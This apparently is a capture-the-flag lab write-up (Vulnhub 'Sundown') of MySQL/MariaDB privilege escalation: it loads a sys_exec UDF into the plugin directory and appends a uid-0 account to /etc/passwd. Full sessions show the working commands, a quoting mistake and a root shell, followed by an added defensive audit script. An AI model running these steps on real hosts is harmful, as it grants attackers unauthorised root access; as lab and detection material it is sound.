Steps for privilege escalation through MySQL, and an explanation of one elementary mistake
Having obtained the target host's MySQL username and password by some means, we now want to execute system commands through MySQL, so we can consider privilege escalation via a UDF. The file lib_mysqludf_sys_64.so (shipped with Kali Linux) must first be uploaded to the target's /tmp directory, and then we connect to the database. A password hash for the root-privileged user to be added also needs to be generated in advance:
┌──(kali㉿kali)-[~/Vulnhub/Sundown]
└─$ sudo openssl passwd -1 -salt bob 123456
$1$bob$7Llv2KscjOtcMna9mt7Ps0
The goal is to append bob (with root privileges) to /etc/passwd, i.e.:
bob:$1$bob$7Llv2KscjOtcMna9mt7Ps0:0:0:User_like_root:/root:/bin/bash
Then perform the following steps in the database (MariaDB requires straight ASCII quotes; typographic quotes produce the ERROR 1064 seen in the session below):
Step 1: use mysql;
Step 2: create a new table: create table potato(line blob);
Step 3: insert the plugin into the table: insert into potato values(load_file('/tmp/lib_mysqludf_sys_64.so'));
Step 4: find the plugin directory: SHOW VARIABLES LIKE '%plugin%';
Step 5: write the shared object into that directory: select * from potato into dumpfile '/usr/lib/x86_64-linux-gnu/mariadb19/plugin/lib_mysqludf_sys_64.so';
Step 6: register the function: create function sys_exec returns integer soname 'lib_mysqludf_sys_64.so';
Next, an elementary mistake was made when inserting the username and password, namely:
select sys_exec('echo "bob:$1$bob$7Llv2KscjOtcMna9mt7Ps0:0:0:User_like_root:/root:/bin/bash" >> /etc/passwd');
Because the passwd entry is inside double quotes, the shell expands the dollar signs ($1, $bob and $7 are treated as parameters, none of which is set), so the hash field actually written to /etc/passwd is corrupted and the password check fails.
As shown below:
MariaDB [mysql]> select sys_exec('echo "jason:12345:0:0:User_like_root:/root:/bin/bash" >> /etc/passwd');
+----------------------------------------------------------------------------------+
| sys_exec('echo "jason:12345:0:0:User_like_root:/root:/bin/bash" >> /etc/passwd') |
+----------------------------------------------------------------------------------+
| 0 |
+----------------------------------------------------------------------------------+
1 row in set (0.001 sec)
MariaDB [mysql]> quit
Bye
carlos@sundown:/tmp$ su - jason
Password:
su: Authentication failure
In fact, simply swapping the single and double quotes in the sys_exec command makes it execute correctly. The full process is as follows:
carlos@sundown:/tmp$ mysql -uroot -p
Enter password:
Welcome to the MariaDB monitor. Commands end with ; or \g.
Your MariaDB connection id is 161571
Server version: 10.3.23-MariaDB-0+deb10u1 Debian 10
Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
MariaDB [(none)]> SHOW VARIABLES LIKE '%plugin%';
+-----------------+---------------------------------------------+
| Variable_name | Value |
+-----------------+---------------------------------------------+
| plugin_dir | /usr/lib/x86_64-linux-gnu/mariadb19/plugin/ |
| plugin_maturity | gamma |
+-----------------+---------------------------------------------+
2 rows in set (0.001 sec)
MariaDB [(none)]> use mysql;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
MariaDB [mysql]> create table potato(line blob);
Query OK, 0 rows affected (0.009 sec)
MariaDB [mysql]> insert into potato values(load_file('/tmp/lib_mysqludf_sys_64.so'));
Query OK, 1 row affected (0.003 sec)
MariaDB [mysql]> SHOW VARIABLES LIKE ‘%plugin%’;
ERROR 1064 (42000): You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near '‘%plugin%’' at line 1
MariaDB [mysql]> SHOW VARIABLES LIKE '%plugin%';
+-----------------+---------------------------------------------+
| Variable_name | Value |
+-----------------+---------------------------------------------+
| plugin_dir | /usr/lib/x86_64-linux-gnu/mariadb19/plugin/ |
| plugin_maturity | gamma |
+-----------------+---------------------------------------------+
2 rows in set (0.001 sec)
MariaDB [mysql]> select * from potato into dumpfile '/usr/lib/x86_64-linux-gnu/mariadb19/plugin/lib_mysqludf_sys_64.so';
Query OK, 1 row affected (0.000 sec)
MariaDB [mysql]> create function sys_exec returns integer soname 'lib_mysqludf_sys_64.so';
Query OK, 0 rows affected (0.000 sec)
MariaDB [mysql]> select sys_exec("echo 'bob:$1$bob$7Llv2KscjOtcMna9mt7Ps0:0:0:User_like_root:/root:/bin/bash' >> /etc/passwd");
+--------------------------------------------------------------------------------------------------------+
| sys_exec("echo 'bob:$1$bob$7Llv2KscjOtcMna9mt7Ps0:0:0:User_like_root:/root:/bin/bash' >> /etc/passwd") |
+--------------------------------------------------------------------------------------------------------+
| 0 |
+--------------------------------------------------------------------------------------------------------+
1 row in set (0.001 sec)
MariaDB [mysql]> quit
carlos@sundown:/tmp$ su - bob
Password:
root@sundown:~# id
uid=0(root) gid=0(root) groups=0(root)
root@sundown:~# ls -alh
total 28K
drwx------ 3 root root 4.0K Aug 3 2020 .
drwxr-xr-x 18 root root 4.0K Aug 3 2020 ..
lrwxrwxrwx 1 root root 9 Aug 3 2020 .bash_history -> /dev/null
-rw-r--r-- 1 root root 570 Jan 31 2010 .bashrc
drwxr-xr-x 3 root root 4.0K Aug 3 2020 .local
lrwxrwxrwx 1 root root 9 Aug 3 2020 .mysql_history -> /dev/null
-rw-r--r-- 1 root root 148 Aug 17 2015 .profile
-rw-r--r-- 1 root root 1.3K Aug 3 2020 proof.txt
-rw-r--r-- 1 root root 66 Aug 3 2020 .selected_editor
root@sundown:~# cat proof.txt
_____,,,\//,,\\,/,
/-- --- --- -----
///--- --- -- - ----
o////- ---- --- --
!!//o/--- -- --
o*) !///,~,,\\,\/,,/,//,,
o!*!o'(\ /\
| ! o ",) \/\ /\ / \/\
o !o! !!| \/ \/ /
( * ( o!'; |\ \ /
o o ! * !` | \ / \
o | o 'o| | : \ /
* o !*!': |o| / /
(o''| `| : / /
! *|'` \|/ \\
' !o!':\ \\ \
( ('| \ `._______/
////\\\,,\///,,,,\,/oO._* o !*!'` `.________/
---- -- ------- - -oO*OoOo (o''| /
-------- ------ 'oO*OoO!*|'o!! \
------- -- - ---- --* oO*OoO *!'| ' /
--- - ----- ---- - oO*OoO!!':o!' /
- - ----- - -- - *--oO*OoOo!` /
\\\\\,,,\\,//////,\,,\\\/,,,\,,ejm/AMC
510252fabb4b7e7dddd7373b7b3da3e8
Thanks for playing - Felipe Winsnes (@whitecr0wz)
root@sundown:~#
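Added example, not part of the original post: a defender-side audit of /etc/passwd-style entries that flags what this technique leaves behind (a second uid-0 account, and a password field holding something other than the shadow marker), and that also models the mistake above by expanding an unset $1, $bob and $7 inside double quotes to nothing, which is why the hash that reached /etc/passwd was unusable. The passwd lines are constructed sample data; the hash is the one generated in the post.

```python
import re

# Simplified model of POSIX sh parameter expansion inside double quotes:
# "$digit" or "$name" is replaced by its value, and an unset one vanishes.
PARAM_RE = re.compile(r"\$(?:\d|[A-Za-z_]\w*)")


def double_quote_expand(s, env=None):
    env = env or {}
    return PARAM_RE.sub(lambda m: env.get(m.group(0)[1:], ""), s)


GOOD_HASH = "$1$bob$7Llv2KscjOtcMna9mt7Ps0"  # from the post (openssl passwd -1)

# Constructed sample in /etc/passwd format (not a real system's file): a normal
# account, the "jason" line with a plaintext password in the hash field, and the
# "bob" line exactly as the double-quoted echo would have written it.
SAMPLE_PASSWD = "\n".join([
    "root:x:0:0:root:/root:/bin/bash",
    "carlos:x:1000:1000:carlos,,,:/home/carlos:/bin/bash",
    "jason:12345:0:0:User_like_root:/root:/bin/bash",
    "bob:%s:0:0:User_like_root:/root:/bin/bash" % double_quote_expand(GOOD_HASH),
])

SHADOW_MARKERS = {"x", "*", "!", "!!"}  # hash lives in /etc/shadow or account locked
CRYPT_RE = re.compile(r"^\$[1-7a-z]+\$[A-Za-z0-9./$=,-]+$")  # $id$salt$hash shape


def audit_passwd(text):
    """Return (user, finding) pairs for entries this technique leaves behind."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            findings.append((line, "line %d: malformed entry" % lineno))
            continue
        user, pw, uid = fields[:3]
        if uid == "0" and user != "root":
            findings.append((user, "uid 0 account other than root"))
        if pw in SHADOW_MARKERS:
            continue
        if pw == "":
            findings.append((user, "empty password field"))
        elif CRYPT_RE.match(pw):
            findings.append((user, "crypt(3) hash kept in /etc/passwd rather than /etc/shadow"))
        else:
            findings.append((user, "password field is neither shadow marker nor crypt(3) hash"))
    return findings
```

Running audit_passwd over a real /etc/passwd and alerting on any finding, together with watching the MariaDB plugin directory and the mysql.func table for new entries, covers both artefacts this post produces.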
Tags: --, Mysql, elementary mistake, sys, privilege escalation, mysql, bob, MariaDB, root
From: https://www.cnblogs.com/jason-huawen/p/16976684.html